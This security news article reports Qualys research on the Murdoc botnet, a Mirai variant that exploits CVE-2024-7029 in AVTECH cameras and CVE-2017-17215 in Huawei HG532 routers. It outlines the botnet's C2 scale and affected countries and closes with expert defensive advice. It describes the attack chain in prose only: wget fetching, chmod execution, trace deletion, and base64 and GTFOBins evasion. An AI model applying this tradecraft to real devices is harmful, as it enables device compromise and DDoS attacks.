The Murdoc Botnet: Reinventing Mirai to Exploit IoT Vulnerabilities

In a new and ongoing large-scale cyber campaign, Qualys researchers have uncovered a variant of the infamous Mirai botnet called the Murdoc Botnet. This variant exploits vulnerabilities in widely used AVTECH Cameras and Huawei HG532 routers, allowing malicious actors to compromise devices and build vast botnet networks for additional malicious activities.

“The Mirai botnet was first publicly identified in late August 2016, and its effects are still felt today,” says Jason Soroko, Senior Fellow at Sectigo. “The threat actors have identified widespread entry points into enterprise and consumer networks, demonstrating that a single outdated or unpatched device can compromise an entire environment.”

This Murdoc Botnet variant has enhanced capabilities, amplifying its reach and efficiency in compromising devices.

Targeting Vulnerable Devices

The Murdoc Botnet campaign is a continuation of Mirai botnet activities, with notable use of ELF files and shell scripts to deploy malware on compromised devices.

The new variant, which began its nefarious operations in mid-2024, specifically targets vulnerable IoT devices, including AVTECH cameras and routers like the Huawei HG532. 

The malware leverages known vulnerabilities, including CVE-2024-7029 and CVE-2017-17215, to gain access and deploy a new botnet payload. A historical timeline of the campaign reveals a surge in attacks since July 2024, with attacks peaking in certain months.

Qualys’ investigation into the geographical impact of the Murdoc Botnet revealed that Malaysia was the most affected country, followed by Thailand, Mexico, and Indonesia.

Technical Insights

During their ongoing threat-hunting analysis, the Qualys Threat Research Unit found substantial evidence pointing to the large-scale distribution of Mirai malware. The team used an FOFA query to discover more than 1300 affected IP addresses, highlighting the growing scale of the campaign, which continues to exploit vulnerable devices worldwide.

An investigation of the campaign’s command-and-control (C2) structure uncovered more than 100 distinct servers responsible for controlling compromised devices and distributing the Mirai malware payload.

These servers enable the botnet’s growth, issuing commands and handling communication with infected devices. Researchers uncovered detailed information on the C2 servers to reveal the embedded payloads and the way in which the botnet operates.

A Variant of Mirai

The Murdoc Botnet shares many characteristics with its predecessor, Mirai, and primarily targets *nix-based systems (operating systems similar to Unix systems). The botnet exploits vulnerabilities in devices such as AVTECH cameras and Huawei routers, using the two known exploits detailed above to deliver its payload.

Once installed, it proceeds to execute specific commands. For instance, the payload targeting AVTECH cameras uses shell scripts to fetch malicious binaries, grant them execution permissions, and remove traces of the attack.

The research also found more than 500 samples of ELF and shell script files, indicating the widespread nature of the attack. The final botnet payload is designed to execute additional malicious activities, including DDoS attacks, on infected devices.

Soroko says the use of shell scripts and ELF binaries to load new payloads reflects how Mirai operators have learned to adapt core techniques like command injection and network reconnaissance for use against a growing range of platforms, even leveraging base64 encoding or common admin utilities (GTFOBins) to slip through the security nets and hinder incident response.

In-Depth Shell Script Analysis

The researchers conducted a detailed analysis of shell scripts used by the Botnet. These scripts are responsible for fetching and executing the malware payload. The payloads are often fetched via the wget command and executed with chmod permissions before being deleted to cover tracks.

The use of GTFOBins, a collection of Unix binaries, also facilitates the execution of the malicious scripts on compromised systems.

Conclusion & Recommendations

This ongoing campaign illustrates the evolving nature of Mirai variants and the persistent threat they pose to IoT devices. The campaign’s use of known exploits to target devices like IP cameras and routers underscores the need for proactive security measures to defend against botnet attacks.

To protect against such attacks, Qualys recommends the following steps:

• Monitor suspicious activities: Regularly inspect for unusual processes or network traffic originating from untrusted binaries or shell scripts.
• Exercise caution with shell scripts: Never execute shell scripts from unknown or untrusted sources.
• Patch systems and firmware: Keep all devices updated with the latest firmware and security patches to protect against known vulnerabilities.

A Persistent, Evolving Threat

According to James Scobey, Chief Information Security Officer at Keeper Security, the discovery of the Murdoc Botnet reveals the persistent and evolving threat IoT vulnerabilities pose to global cybersecurity.

“By exploiting weak points in AVTECH cameras and Huawei routers, attackers create botnets capable of launching powerful DDoS attacks. To counteract such threats, organizations must prioritize better IoT security practices, including hardening device configurations and managing passwords and secrets to restrict unauthorized control.”

Moreover, he says malefactors will often use these exploits to move laterally within victim networks.  “Applying zero-trust principles, including the use of Privileged Access Management (PAM), is critical to preventing additional exploitation. The attackers’ ability to re-leverage previously exploited vulnerabilities underscores the importance of proactive patching and vigilance against recurring threats.”

 “As the botnet’s capabilities expand, defenders must shift toward proactive measures such as routine patching, continuous monitoring for anomalous traffic, and strict access controls to mitigate the impact of a single compromised IoT device in a networked ecosystem,” Soroko ends.